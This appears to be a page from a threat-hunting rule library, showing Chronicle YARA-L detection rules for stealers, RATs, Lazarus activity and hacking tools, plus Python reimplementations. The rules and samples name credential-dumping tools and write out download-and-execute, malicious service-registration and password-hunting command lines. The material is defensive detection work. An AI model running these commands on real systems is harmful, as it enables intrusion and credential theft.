($selection1.metadata.product_event_type = "13" and (re.regex($selection1.target.registry.registry_key, `.*\\DefaultObjectStore\\LruList\\.*`) or re.regex($selection1.target.registry.registry_key, `.*\\DefaultObjectStore\\LruList\\00000000000002FC\\.*`) or re.regex($selection1.target.registry.registry_key, `.*\\DefaultObjectStore\\ObjectTable\\E8\\.*`) or re.regex($selection1.target.registry.registry_key, `.*\\DefaultObjectStore\\ObjectTable\\E9\\.*`) or re.regex($selection1.target.registry.registry_key, `.*\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\.*`)))

  condition:
    $selection1
}
Chronicle (YARA-L) Original YARA-L T1005 ↗
fallout_rig_ek_delivers_raccoon_stealer
Detects Raccoon Stealer delivered by the Fallout and RIG exploit kits. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
Show query
rule fallout_rig_ek_delivers_raccoon_stealer {
 meta:
    author = "Emir Erdogan"
    description = "Detects Raccoon Stealer delivered by the Fallout and RIG exploit kits. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/9lYIAZKxCWzK"
    version = "0.01"
    created = "2019/11/24"
    product = "windows"
    service = "sysmon"
    mitre = "T1140, T1059, T1005, T1022, T1105, T1057"

  events:
(((re.regex($selection1.target.process.file.full_path, `.*\\cvtres\.exe`) and re.regex($selection1.principal.process.file.full_path, `.*\\csc\.exe`)) or ($selection1.metadata.product_event_type = "1" and (re.regex($selection1.target.process.file.full_path, `.*\\csc\.exe`) or re.regex($selection1.target.process.file.full_path, `.*\\AyJWa1N0\.tmp`)) and re.regex($selection1.principal.process.file.full_path, `.*\\powershell\.exe`))) or (re.regex($selection1.target.process.file.full_path, `.*\\cmd\.exe`) and re.regex($selection1.principal.process.file.full_path, `.*\\AyJWa1N0\.tmp`)))

  condition:
    $selection1
}
Chronicle (YARA-L) Original YARA-L T1059 ↗
hacktool_ironsharp_pack_execution
Detects the execution of known attacker tools, including but not limited to those in the IronSharpPack toolset. These tools are commonly used for offensive security operations and may indicate malicious activity if observed in unauthorized environments.
Show query
rule hacktool_ironsharp_pack_execution {

    meta:
      author = "Georg Lauenstein - suresecure GmbH"
      description = "Detects the execution of known attacker tools, including but not limited to those in the IronSharpPack toolset. These tools are commonly used for offensive security operations and may indicate malicious activity if observed in unauthorized environments."
      rule_id = "mr_34f2ecef-cd3e-4dee-9c83-b7a9ec34becc"
      rule_name = "Hacktool - IronSharpPack Execution"
      tactic = "TA0002"
      technique = "T1059"
      references = "https://github.com/BC-SECURITY/IronSharpPack"
      type = "alert"
      platform = "Linux, Windows, EDR"
      data_source = "Sysmon for Linux, Microsoft Sysmon, Windows Event Logs"
      severity = "Medium"  // Adjust based on your risk assessment
      priority = "Medium"  // Adjust based on your incident response process

    events:
      $ironsharp_execution.metadata.event_type = "PROCESS_LAUNCH"
      $ironsharp_execution.target.process.file.full_path = /cmd\.exe|python.*\.exe|ipy\.exe|powershell\.exe|pwsh\.exe|wsl\.exe/ nocase and
      $ironsharp_execution.target.process.command_line = /IronADCSPwn\.py|IronADFSDump\.py|IronBetterSafetyKatz\.py|IronCertify\.py|IronDeployPrinterNightmare\.py|IronEmbed\.py|IronEDD\.py|IronGrouper2\.py|IronInveigh\.py|IronLockLess\.py|IronPassTheCert\.py|IronRubeus\.py|IronSafetyKatz\.py|IronSearchOutlook\.py|IronSeatbelt\.py|IronSharPersist\.py|IronSharp-SMBExec\.py|IronSharpAllowedToAct\.py|IronSharpBypassUAC\.py|IronSharpCOM\.py|IronSharpChisel\.py|IronSharpChrome\.py|IronSharpChromium\.py|IronSharpCloud\.py|IronSharpCookieMonster\.py|IronSharpCrashEventLog\.py|IronSharpDPAPI\.py|IronSharpDir\.py|IronSharpDoor\.py|IronSharpDump\.py|IronSharpEDRChecker\.py|IronSharpExec\.py|IronSharpGPOAbuse\.py|IronSharpHandler\.py|IronSharpKatz\.py|IronSharpLAPS\.py|IronSharpMapExec\.py|IronSharpMiniDump\.py|IronSharpMove\.py|IronSharpNamedPipePTH\.py|IronSharpReg\.py|IronSharpSQLPwn\.py|IronSharpSearch\.py|IronSharpSecDump\.py|IronSharpSniper\.py|IronSharpSpray\.py|IronSharpStay\.py|IronSharpTask\.py|IronSharpUp\.py|IronSharpWMI\.py|IronSharpWebServer\.py|IronSharpWifiGrabber\.py|IronSharpZeroLogon\.py|IronShhmon\.py|IronSqlClient\.py|IronStandIn\.py|IronStickyNotesExtract\.py|IronThunderFox\.py|IronTokenStomp\.py|IronWMIReg\.py|IronWatson\.py|Iron_RunasCs\.py|Ironscout\.py|Ironsharpfiles\.py|Ironsharpshares\.py/ nocase

      // Capture the hostname where the event occurred
      $ironsharp_execution.principal.hostname = $hostname

    match:
      $hostname over 15m

    outcome:
      $risk_score = max(65)
      $event_count = count_distinct($ironsharp_execution.metadata.id)
      $principal_process_pid = array_distinct($ironsharp_execution.principal.process.pid)
      $principal_process_command_line = array_distinct($ironsharp_execution.principal.process.command_line)
      $principal_process_file_sha256 = array_distinct($ironsharp_execution.principal.process.file.sha256)
      $principal_process_file_full_path = array_distinct($ironsharp_execution.principal.process.file.full_path)
      $principal_process_product_specific_process_id = array_distinct($ironsharp_execution.principal.process.product_specific_process_id)
      $principal_process_parent_process_product_specific_process_id = array_distinct($ironsharp_execution.principal.process.parent_process.product_specific_process_id)
      $target_process_pid = array_distinct($ironsharp_execution.target.process.pid)
      $target_process_command_line = array_distinct($ironsharp_execution.target.process.command_line)
      $target_process_file_sha256 = array_distinct($ironsharp_execution.target.process.file.sha256)
      $target_process_file_full_path = array_distinct($ironsharp_execution.target.process.file.full_path)
      $target_process_product_specific_process_id = array_distinct($ironsharp_execution.target.process.product_specific_process_id)
      $principal_user_userid = array_distinct($ironsharp_execution.principal.user.userid)

    condition:
      $ironsharp_execution
}
Chronicle (YARA-L) Original YARA-L T1087 ↗
hacktool_purpleknight_execution
This detection rule identifies the execution of the Purple Knight tool, a free Active Directory security assessment utility developed by Semperis. Purple Knight is designed to scan for AD vulnerabilities, misconfigurations, and common attack paths. While it is a legitimate tool used by defenders, its execution in production environments may also indicate red team activity or unauthorized reconnaissance by adversaries attempting to map domain weaknesses.
rule hacktool_purpleknight_execution {

    meta:
      author = "Georg Lauenstein - suresecure GmbH"
      description = "This detection rule identifies the execution of the Purple Knight tool, a free Active Directory security assessment utility developed by Semperis. Purple Knight is designed to scan for AD vulnerabilities, misconfigurations, and common attack paths. While it is a legitimate tool used by defenders, its execution in production environments may also indicate red team activity or unauthorized reconnaissance by adversaries attempting to map domain weaknesses."
      rule_id = "mr_69e428bb-c946-4e3f-abb8-0e28316f2389"
      rule_name = "Purple Knight Tool Execution Detected"
      tactic = "TA0007"
      technique = "T1087"
      references = "https://www.purple-knight.com/"
      type = "alert"
      platform = "Windows, EDR"
      data_source = "Microsoft Sysmon, Windows Event Logs"
      severity = "Medium"  // Adjust based on your risk assessment
      priority = "Medium"  // Adjust based on your incident response process

    events:
      $purple_knight.metadata.event_type = "PROCESS_LAUNCH"
      (
        $purple_knight.target.process.file.full_path = /\\PurpleKnight\.exe$/ nocase or
        $purple_knight.principal.process.file.full_path = /\\PurpleKnight\.exe$/ nocase or
        $purple_knight.principal.process.command_line = /PurpleKnight/ nocase
      )

      // Capture the hostname where the event occurred
      $purple_knight.principal.hostname = $hostname

    match:
      $hostname over 10m

    outcome:
      $risk_score = max(65)
      $event_count = count_distinct($purple_knight.metadata.id)
      $principal_process_pid = array_distinct($purple_knight.principal.process.pid)
      $principal_process_command_line = array_distinct($purple_knight.principal.process.command_line)
      $principal_process_file_sha256 = array_distinct($purple_knight.principal.process.file.sha256)
      $principal_process_file_full_path = array_distinct($purple_knight.principal.process.file.full_path)
      $principal_process_product_specific_process_id = array_distinct($purple_knight.principal.process.product_specific_process_id)
      $principal_process_parent_process_product_specific_process_id = array_distinct($purple_knight.principal.process.parent_process.product_specific_process_id)
      $target_process_pid = array_distinct($purple_knight.target.process.pid)
      $target_process_command_line = array_distinct($purple_knight.target.process.command_line)
      $target_process_file_sha256 = array_distinct($purple_knight.target.process.file.sha256)
      $target_process_file_full_path = array_distinct($purple_knight.target.process.file.full_path)
      $target_process_product_specific_process_id = array_distinct($purple_knight.target.process.product_specific_process_id)
      $principal_user_userid = array_distinct($purple_knight.principal.user.userid)

    condition:
      $purple_knight
}
Chronicle (YARA-L) Original YARA-L T1082 ↗
hacktool_winpeas_execution_patterns
This detection rule identifies the execution of WinPEAS (Windows Privilege Escalation Awesome Script), a post-exploitation reconnaissance tool used to discover privilege escalation paths on Windows systems. WinPEAS performs a wide range of local enumeration checks, including service misconfigurations, permission issues, token privileges, and more. Its usage is commonly observed during red team assessments and by adversaries seeking to elevate privileges after gaining initial access. WinPEAS checks are well-documented in the HackTricks knowledge base.
rule hacktool_winpeas_execution_patterns {

    meta:
      author = "Georg Lauenstein - suresecure GmbH"
      description = "This detection rule identifies the execution of WinPEAS (Windows Privilege Escalation Awesome Script), a post-exploitation reconnaissance tool used to discover privilege escalation paths on Windows systems. WinPEAS performs a wide range of local enumeration checks, including service misconfigurations, permission issues, token privileges, and more. Its usage is commonly observed during red team assessments and by adversaries seeking to elevate privileges after gaining initial access. WinPEAS checks are well-documented in the HackTricks knowledge base."
      rule_id = "mr_9c9ad668-485a-4b10-b85d-36ba63546304"
      rule_name = "Hacktool - WinPEAS Execution Patterns"
      tactic = "TA0007"
      technique = "T1082"
      references = "https://github.com/carlospolop/PEASS-ng, https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html, https://www.microsoft.com/en-us/security/blog/2022-10-14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/, https://www.logpoint.com/wp-content/uploads/2023/02/emerging-threats-the-play-report.pdf"
      type = "alert"
      platform = "Windows, EDR"
      data_source = "Microsoft Sysmon, Windows Event Logs"
      severity = "Medium"  // Adjust based on your risk assessment
      priority = "Medium"  // Adjust based on your incident response process

    events:
      $winpeas_execution.metadata.event_type = "PROCESS_LAUNCH"
      and
        (
          // Known WinPEAS binary names (the src.process path carries no leading backslash, the target.process path does)
          $winpeas_execution.src.process.file.full_path = /winPEAS\.exe|winPEASany\.exe|winPEASany_ofs\.exe|winPEASx64\.exe|winPEASx64_ofs\.exe|winPEASx86\.exe|winPEASx86_ofs\.exe/ nocase or
          $winpeas_execution.target.process.file.full_path = /\\winPEAS\.exe|\\winPEASany\.exe|\\winPEASany_ofs\.exe|\\winPEASx64\.exe|\\winPEASx64_ofs\.exe|\\winPEASx86\.exe|\\winPEASx86_ofs\.exe/ nocase or
          // WinPEAS check-group names passed on the command line (still fires for a renamed binary if the check names are kept)
          $winpeas_execution.target.process.command_line = /processinfo|servicesinfo|applicationsinfo|networkinfo|windowscreds|browserinfo|filesinfo|fileanalysis|eventsinfo/ nocase

          or
            // winPEAS.ps1 fetched straight from the PEASS-ng GitHub repository
            (
              $winpeas_execution.target.process.command_line = /raw\.githubusercontent\.com/ nocase and
              $winpeas_execution.target.process.command_line = /carlospolop/ nocase and
              $winpeas_execution.target.process.command_line = /winPEAS\.ps1/ nocase
            )

          or
            // Command line ending in the -linpeas switch
            (
              $winpeas_execution.principal.process.command_line = / -linpeas$/ nocase or
              $winpeas_execution.target.process.command_line = / -linpeas$/ nocase
            )
        )

      not
        (
          // Exclusion: Microsoft Defender for Endpoint (formerly Defender ATP) sensor update downloads
          $winpeas_execution.additional.fields["current_directory"] = "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\"
        )

      // Capture the hostname where the event occurred
      $winpeas_execution.principal.hostname = $hostname

    match:
      $hostname over 10m

    outcome:
      $risk_score = max(65)
      $event_count = count_distinct($winpeas_execution.metadata.id)
      $principal_process_pid = array_distinct($winpeas_execution.principal.process.pid)
      $principal_process_command_line = array_distinct($winpeas_execution.principal.process.command_line)
      $principal_process_file_sha256 = array_distinct($winpeas_execution.principal.process.file.sha256)
      $principal_process_file_full_path = array_distinct($winpeas_execution.principal.process.file.full_path)
      $principal_process_product_specific_process_id = array_distinct($winpeas_execution.principal.process.product_specific_process_id)
      $principal_process_parent_process_product_specific_process_id = array_distinct($winpeas_execution.principal.process.parent_process.product_specific_process_id)
      $target_process_pid = array_distinct($winpeas_execution.target.process.pid)
      $target_process_command_line = array_distinct($winpeas_execution.target.process.command_line)
      $target_process_file_sha256 = array_distinct($winpeas_execution.target.process.file.sha256)
      $target_process_file_full_path = array_distinct($winpeas_execution.target.process.file.full_path)
      $target_process_product_specific_process_id = array_distinct($winpeas_execution.target.process.product_specific_process_id)
      $principal_user_userid = array_distinct($winpeas_execution.principal.user.userid)

    condition:
      $winpeas_execution
}
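As an added illustration that is not part of this hunt pack or of the rule author's work, the following Python reproduces the logic of the WinPEAS rule above (the Purple Knight rule two entries up has the same shape and can be exercised the same way): the events-section indicators, the Defender-directory exclusion, and the per-hostname grouping with the outcome variables. The flat event dictionaries and their key names are a stand-in for the UDM paths, the fixed ten-minute buckets are a simplification of Chronicle's windowing, and the four sample events are constructed, not real telemetry.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators copied from the rule's events section; re.IGNORECASE stands in for YARA-L's nocase.
WINPEAS_SRC_IMAGE = re.compile(
    r"winPEAS\.exe|winPEASany\.exe|winPEASany_ofs\.exe|winPEASx64\.exe"
    r"|winPEASx64_ofs\.exe|winPEASx86\.exe|winPEASx86_ofs\.exe", re.IGNORECASE)
WINPEAS_TARGET_IMAGE = re.compile(
    r"\\winPEAS\.exe|\\winPEASany\.exe|\\winPEASany_ofs\.exe|\\winPEASx64\.exe"
    r"|\\winPEASx64_ofs\.exe|\\winPEASx86\.exe|\\winPEASx86_ofs\.exe", re.IGNORECASE)
WINPEAS_CHECKS = re.compile(
    r"processinfo|servicesinfo|applicationsinfo|networkinfo|windowscreds"
    r"|browserinfo|filesinfo|fileanalysis|eventsinfo", re.IGNORECASE)
WINPEAS_PS1 = [re.compile(p, re.IGNORECASE)
               for p in (r"raw\.githubusercontent\.com", r"carlospolop", r"winPEAS\.ps1")]
LINPEAS_SWITCH = re.compile(r" -linpeas$", re.IGNORECASE)
# Exclusion from the rule: exact match on the current directory of MDE sensor downloads
MDE_DOWNLOADS = "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\"


def event_matches(ev: dict) -> bool:
    """Events section: PROCESS_LAUNCH and any one indicator, unless the exclusion applies.

    The dictionary keys are an assumed flat stand-in for the UDM paths in the rule.
    """
    if ev.get("event_type") != "PROCESS_LAUNCH":
        return False
    src_path = ev.get("src_process_path", "")
    tgt_path = ev.get("target_process_path", "")
    tgt_cmd = ev.get("target_cmdline", "")
    pri_cmd = ev.get("principal_cmdline", "")
    hit = (
        WINPEAS_SRC_IMAGE.search(src_path) is not None
        or WINPEAS_TARGET_IMAGE.search(tgt_path) is not None
        or WINPEAS_CHECKS.search(tgt_cmd) is not None
        or all(p.search(tgt_cmd) for p in WINPEAS_PS1)
        or LINPEAS_SWITCH.search(pri_cmd) is not None
        or LINPEAS_SWITCH.search(tgt_cmd) is not None
    )
    # The trailing "not (...)" block: a genuine indicator hit from this directory is still dropped
    return hit and ev.get("current_directory") != MDE_DOWNLOADS


def correlate(events, window=timedelta(minutes=10)):
    """Approximate `match: $hostname over 10m` and the outcome section.

    Chronicle groups matching events per hostname inside a time window; this stand-in
    uses fixed 10-minute buckets, a simplification of that windowing.
    """
    groups = defaultdict(list)
    for ev in events:
        if event_matches(ev):
            bucket = ev["ts"] - (ev["ts"] - datetime.min) % window
            groups[(ev["hostname"], bucket)].append(ev)
    alerts = {}
    for key, evs in groups.items():
        alerts[key] = {
            "risk_score": 65,                                    # max(65) in the rule
            "event_count": len({e["id"] for e in evs}),          # count_distinct(metadata.id)
            "target_process_command_line": sorted({e.get("target_cmdline", "") for e in evs}),
            "principal_user_userid": sorted({e.get("userid", "") for e in evs}),
        }
    return alerts


# Constructed sample events (not real telemetry): two WinPEAS launches on WS01 within ten
# minutes, one launch from the MDE download directory on WS02 that trips an indicator but is
# excluded, and one benign launch on WS03. Paths, names and URL are illustrative.
SAMPLE_EVENTS = [
    {"id": "e1", "ts": datetime(2024, 5, 6, 10, 2), "hostname": "WS01", "userid": "bob",
     "event_type": "PROCESS_LAUNCH",
     "target_process_path": "C:\\Users\\bob\\Downloads\\winPEASx64.exe",
     "target_cmdline": "winPEASx64.exe servicesinfo"},
    {"id": "e2", "ts": datetime(2024, 5, 6, 10, 5), "hostname": "WS01", "userid": "bob",
     "event_type": "PROCESS_LAUNCH",
     "target_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target_cmdline": "powershell -c \"IEX(New-Object Net.WebClient).DownloadString("
                       "'https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\""},
    {"id": "e3", "ts": datetime(2024, 5, 6, 10, 7), "hostname": "WS02", "userid": "SYSTEM",
     "event_type": "PROCESS_LAUNCH",
     "target_process_path": MDE_DOWNLOADS + "update.exe",
     "target_cmdline": "update.exe --stage networkinfo",
     "current_directory": MDE_DOWNLOADS},
    {"id": "e4", "ts": datetime(2024, 5, 6, 10, 9), "hostname": "WS03", "userid": "alice",
     "event_type": "PROCESS_LAUNCH",
     "target_process_path": "C:\\Windows\\System32\\notepad.exe",
     "target_cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for (host, bucket), outcome in correlate(SAMPLE_EVENTS).items():
        print(host, bucket.strftime("%H:%M"), outcome)
```

The exclusion is evaluated after the indicators, exactly as the rule's trailing `not (...)` does, so the WS02 launch that mentions `networkinfo` is dropped before correlation and only WS01 produces an alert, with two distinct event IDs rolled into one outcome.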
Chronicle (YARA-L) Original YARA-L T1082 ↗
hostdomain_enumeration_with_wmic
Detects host and domain enumeration attempts made with wmic. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
rule hostdomain_enumeration_with_wmic {
  meta:
    author = "Osman Demir"
    description = "Detects the Host/Domain Enumeration Attempts. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/tZIBjTZedRxS"
    version = "0.01"
    created = "2021-03-09"
    product = "windows"
    service = "sysmon"
    mitre = "discovery, T1082, T1083, T1087"

  events:
    // Note: "=" is an exact, whole-value comparison in YARA-L, so the string literals
    // below only fire when the field holds precisely that value; the re.regex()
    // branches match a substring anywhere in the command line.
    (
      $selection.target.process.file.full_path = "cmd.exe" or
      $selection.target.process.file.full_path = "powershell.exe"
    )
    and
    (
      // Local OS, hardware, security product and patch-level enumeration
      $selection.target.process.command_line = "wmic os LIST Full" or
      $selection.target.process.command_line = "wmic computersystem LIST full" or
      $selection.target.process.command_line = "wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct" or
      $selection.target.process.command_line = "wmic path Win32_PnPdevice" or
      $selection.target.process.command_line = "wmic qfe list brief" or
      // File and credential hunting through the DATAFILE class
      re.regex($selection.target.process.command_line, `wmic DATAFILE where \"path='\\\\Users\\\\test\\\\Documents\\\\'\" GET .*`) or
      re.regex($selection.target.process.command_line, `wmic DATAFILE where \"drive='C:' AND Name like '%password%'\" GET .*`) or
      // Local and domain user, group and computer enumeration
      re.regex($selection.target.process.command_line, `wmic USERACCOUNT Get .*`) or
      $selection.target.process.command_line = "wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE" or
      re.regex($selection.target.process.command_line, `wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_user where .*`) or
      $selection.target.process.command_line = "wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_user GET ds_samaccountname" or
      $selection.target.process.command_line = "wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_group GET ds_samaccountname" or
      $selection.target.process.command_line = "wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_group where \"ds_samaccountname='Domain Admins'\" Get     ds_member /Value" or
      re.regex($selection.target.process.command_line, `wmic path win32_groupuser where \(groupcomponent=\"win32_group\.name=\"domain admins\",domain .*\"\)`) or
      $selection.target.process.command_line = "wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_computer GET ds_samaccountname" or
      $selection.target.process.command_line = "wmic /NAMESPACE:\\\\root\\directory\\ldap PATH ds_computer GET ds_dnshostname"
    )

  condition:
    $selection
}
Chronicle (YARA-L) Original YARA-L T1059 ↗
lazarus_attack_variant
Detects a Lazarus attack variant via move.exe and reg.exe. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
rule lazarus_attack_variant {
  meta:
    author = "Ariel Millahuel"
    description = "Detects a Lazarus attack variant via move.exe and reg.exe. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/XK07zRt3m5OF"
    version = "0.01"
    created = "2021-03-09"
    category = "process_creation"
    product = "windows"
    mitre = "execution, T1059"

  events:
    // Process creation: Security EID 4688 or Sysmon EID 1
    (
      $selection1.metadata.product_event_type = "4688" or
      $selection1.metadata.product_event_type = "1"
    )
    and
    (
      // Stage 1: dropped files moved into place under the sqcsvc service name
      (
        $selection1.target.process.file.full_path = "move.exe" and
        (
          $selection1.target.process.command_line = "move \"c:\\perflogs\\1.dat\" \"c:\\programdata\\microsoft\\sqcsvc\\sqcsvc6.ldx\"" or
          $selection1.target.process.command_line = "move \"c:\\perflogs\\1.dll\" \"c:\\windows\\system32\\sqcsvc.dll\"" or
          $selection1.target.process.command_line = "move \"c:\\perflogs\\1.dll.mui\" \"c:\\windows\\system32\\sqcsvc.dll.mui\""
        )
      )
      or
      // Stage 2: the DLL registered as an svchost-hosted service
      (
        $selection1.target.process.file.full_path = "reg.exe" and
        (
          $selection1.target.process.command_line = "reg add \"HKLM\\SYSTEM\\ControlSet001\\Services\\sqcsvc\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%SystemRoot%\\System32\\sqcsvc.dll\"" or
          // Value type corrected to REG_MULTI_SZ (the source read "REG_ MULTI_SZ", which reg.exe does not accept)
          $selection1.target.process.command_line = "reg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v sqcsvc /t REG_MULTI_SZ /d sqcsvc"
        )
      )
    )

  condition:
    $selection1
}
Chronicle (YARA-L) Original YARA-L T1059 ↗
loda_rat_detection
Detects Loda, a Remote Access Trojan with spying capabilities, via its msiexec download-and-install command line. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md.
rule loda_rat_detection {
  meta:
    author = "Ariel Millahuel"
    description = "Loda is a Remote Access Trojan with spying capabilities. License: https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md."
    reference = "https://tdm.socprime.com/tdm/info/yO2dtTK5tKlD"
    version = "0.01"
    created = "2021-03-09"
    category = "process_creation"
    product = "windows"
    mitre = "execution, T1059"

  events:
    $selection1.target.process.file.full_path = "cmd.exe" and
    (
      // Known Loda staging host
      re.regex($selection1.target.process.command_line, `cmd\.exe & /C CD C:/ & msiexec\.exe /i http.*://lcodigo\.com/apiW/config/uploads/tmp/.*\.msi /quiet`) or
      // Same msiexec download-and-install pattern against any .com host with the same path layout
      re.regex($selection1.target.process.command_line, `cmd\.exe & /C CD C:/ & msiexec\.exe /i http.*://.*\.com/api.*/config/uploads/tmp/.*\.msi /quiet`)
    ) and
    // Process creation: Security EID 4688 or Sysmon EID 1
    (
      $selection1.metadata.product_event_type = "4688" or
      $selection1.metadata.product_event_type = "1"
    )

  condition:
    $selection1
}
Chronicle (YARA-L) Original YARA-L T1059 ↗
malware_dridex_dropper_doc_20191217
Dridex dropper doc (mechanisms from Powershell)
rule malware_dridex_dropper_doc_20191217
{
  meta:
    author = "Google Cloud Security"
    description = "Dridex dropper doc (mechanisms from Powershell)"
    reference = "https://attack.mitre.org/techniques/T1059/"
    ref_hash = "57e25974e9e52c87aff9e0cae39bd7670a5d861fd70b9694a43a612cb56c6d88"
    yara_version = "YL2.0"
    rule_version = "1.0"

  events:
    $e1.metadata.event_type = "PROCESS_LAUNCH"
    // "JAB" is the base64 encoding of a UTF-16LE "$", so "-en jab..." is an -EncodedCommand script that opens with a variable
    re.regex($e1.principal.process.command_line, `powershell -w hidden -en jabf`) nocase

  condition:
    $e1
}
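The regex in this rule keys on the first four base64 characters of the encoded command. The following Python, added here and not part of the page or of the rule author's work, shows what that prefix actually pins down: it builds `-EncodedCommand` payloads the way powershell.exe expects them (base64 over UTF-16LE), applies the rule's literal, and decodes the payload so a hunt can test the script's first character rather than its base64 form. All command lines and scripts in it are constructed for the example.

```python
import base64
import re
from typing import Optional

# The rule's literal, with re.IGNORECASE standing in for YARA-L's nocase
RULE_PATTERN = re.compile(r"powershell -w hidden -en jabf", re.IGNORECASE)
# powershell.exe resolves -e, -ec, -en, -enc and -EncodedCommand to the same parameter
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                         re.IGNORECASE)


def encode_powershell_command(script: str) -> str:
    """Build the value PowerShell expects after -EncodedCommand: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Pull the base64 token out of a command line, whichever spelling of the switch was used."""
    m = ENCODED_ARG.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(token: str) -> str:
    """Reverse the encoding; tolerate '=' padding that a log pipeline trimmed."""
    raw = base64.b64decode(token + "=" * (-len(token) % 4))
    return raw.decode("utf-16-le", errors="replace")


def matches_rule(cmdline: str) -> bool:
    """The page's check: one fixed substring, switch spelling and base64 prefix included."""
    return RULE_PATTERN.search(cmdline) is not None


def decoded_script_starts_with(cmdline: str, prefix: str) -> bool:
    """Content check: decode the payload and test the script itself, not its base64 form."""
    token = extract_encoded_command(cmdline)
    return token is not None and decode_encoded_command(token).startswith(prefix)


if __name__ == "__main__":
    # Constructed scripts; only the first two characters decide the base64 prefix
    for script in ("$Ez = 'x'", "$_ = 1", "$foo = 2", "Write-Host hi"):
        enc = encode_powershell_command(script)
        cmd = f"powershell -w hidden -en {enc}"
        print(f"{script!r:16} -> {enc[:8]}...  rule={matches_rule(cmd)}  "
              f"starts_with_$={decoded_script_starts_with(cmd, '$')}")
```

`JAB` is `$` followed by the UTF-16 null byte, and the fourth character carries the script's second character: `JABF` decodes to `$E` and `JABf` to `$_`, so a script beginning `$foo` encodes to `JABm...` and never matches the literal, nor does a launch that spells the switch `-enc` or `-EncodedCommand` instead of `-en`. Decoding the payload and checking the script text is the more robust form of the same idea, at the cost of also matching every encoded command that opens with a variable.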
Showing 151-200 of 990